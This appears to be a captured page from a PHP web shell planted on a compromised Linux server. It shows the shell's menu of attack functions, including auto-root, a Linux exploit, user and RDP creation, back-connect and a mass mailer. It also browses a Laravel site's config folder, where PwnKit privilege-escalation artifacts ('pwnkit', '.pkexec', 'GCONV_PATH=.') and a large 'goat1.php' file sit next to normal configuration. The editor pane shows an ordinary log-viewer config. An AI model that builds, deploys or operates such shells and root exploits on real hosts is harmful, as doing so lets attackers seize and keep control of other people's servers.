Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : log-viewer.php
<?php return [ /* |-------------------------------------------------------------------------- | Log Viewer |-------------------------------------------------------------------------- | Log Viewer can be disabled, so it's no longer accessible via browser. | */ 'enabled' => env('LOG_VIEWER_ENABLED', true), 'api_only' => env('LOG_VIEWER_API_ONLY', false), 'require_auth_in_production' => true, /* |-------------------------------------------------------------------------- | Log Viewer Domain |-------------------------------------------------------------------------- | You may change the domain where Log Viewer should be active. | If the domain is empty, all domains will be valid. | */ 'route_domain' => null, /* |-------------------------------------------------------------------------- | Log Viewer Route |-------------------------------------------------------------------------- | Log Viewer will be available under this URL. | */ 'route_path' => 'log-viewer', /* |-------------------------------------------------------------------------- | Back to system URL |-------------------------------------------------------------------------- | When set, displays a link to easily get back to this URL. | Set to `null` to hide this link. | | Optional label to display for the above URL. | */ 'back_to_system_url' => config('app.url', null), 'back_to_system_label' => null, // Displayed by default: "Back to {{ app.name }}" /* |-------------------------------------------------------------------------- | Log Viewer time zone. |-------------------------------------------------------------------------- | The time zone in which to display the times in the UI. Defaults to | the application's timezone defined in config/app.php. | */ 'timezone' => 'Asia/Kolkata', /* |-------------------------------------------------------------------------- | Log Viewer route middleware. |-------------------------------------------------------------------------- | Optional middleware to use when loading the initial Log Viewer page. | */ 'middleware' => [ 'web', 'super-admin', 'auth', \Opcodes\LogViewer\Http\Middleware\AuthorizeLogViewer::class, ], /* |-------------------------------------------------------------------------- | Log Viewer API middleware. |-------------------------------------------------------------------------- | Optional middleware to use on every API request. The same API is also | used from within the Log Viewer user interface. | */ 'api_middleware' => [ \Opcodes\LogViewer\Http\Middleware\EnsureFrontendRequestsAreStateful::class, \Opcodes\LogViewer\Http\Middleware\AuthorizeLogViewer::class, ], 'api_stateful_domains' => env('LOG_VIEWER_API_STATEFUL_DOMAINS') ? explode(',', env('LOG_VIEWER_API_STATEFUL_DOMAINS')) : null, /* |-------------------------------------------------------------------------- | Log Viewer Remote hosts. |-------------------------------------------------------------------------- | Log Viewer supports viewing Laravel logs from remote hosts. They must | be running Log Viewer as well. Below you can define the hosts you | would like to show in this Log Viewer instance. | */ 'hosts' => [ 'local' => [ 'name' => ucfirst(env('APP_ENV', 'local')), ], // 'staging' => [ // 'name' => 'Staging', // 'host' => 'https://staging.example.com/log-viewer', // 'auth' => [ // Example of HTTP Basic auth // 'username' => 'username', // 'password' => 'password', // ], // ], // // 'production' => [ // 'name' => 'Production', // 'host' => 'https://example.com/log-viewer', // 'auth' => [ // Example of Bearer token auth // 'token' => env('LOG_VIEWER_PRODUCTION_TOKEN'), // ], // 'headers' => [ // 'X-Foo' => 'Bar', // ], // ], ], /* |-------------------------------------------------------------------------- | Include file patterns |-------------------------------------------------------------------------- | */ 'include_files' => [ '*.log', '**/*.log', // You can include paths to other log types as well, such as apache, nginx, and more. '/var/log/httpd/*', '/var/log/nginx/*', // MacOS Apple Silicon logs '/opt/homebrew/var/log/nginx/*', '/opt/homebrew/var/log/httpd/*', '/opt/homebrew/var/log/php-fpm.log', '/opt/homebrew/var/log/postgres*log', '/opt/homebrew/var/log/redis*log', '/opt/homebrew/var/log/supervisor*log', // '/absolute/paths/supported', ], /* |-------------------------------------------------------------------------- | Exclude file patterns. |-------------------------------------------------------------------------- | This will take precedence over included files. | */ 'exclude_files' => [ // 'my_secret.log' ], /* |-------------------------------------------------------------------------- | Hide unknown files. |-------------------------------------------------------------------------- | The include/exclude options above might catch files which are not | logs supported by Log Viewer. In that case, you can hide them | from the UI and API calls by setting this to true. | */ 'hide_unknown_files' => true, /* |-------------------------------------------------------------------------- | Shorter stack trace filters. |-------------------------------------------------------------------------- | Lines containing any of these strings will be excluded from the full log. | This setting is only active when the function is enabled via the user interface. | */ 'shorter_stack_trace_excludes' => [ '/vendor/symfony/', '/vendor/laravel/framework/', '/vendor/barryvdh/laravel-debugbar/', ], /* |-------------------------------------------------------------------------- | Cache driver |-------------------------------------------------------------------------- | Cache driver to use for storing the log indices. Indices are used to speed up | log navigation. Defaults to your application's default cache driver. | */ 'cache_driver' => env('LOG_VIEWER_CACHE_DRIVER', null), /* |-------------------------------------------------------------------------- | Chunk size when scanning log files lazily |-------------------------------------------------------------------------- | The size in MB of files to scan before updating the progress bar when searching across all files. | */ 'lazy_scan_chunk_size_in_mb' => 50, 'strip_extracted_context' => true, ];
Close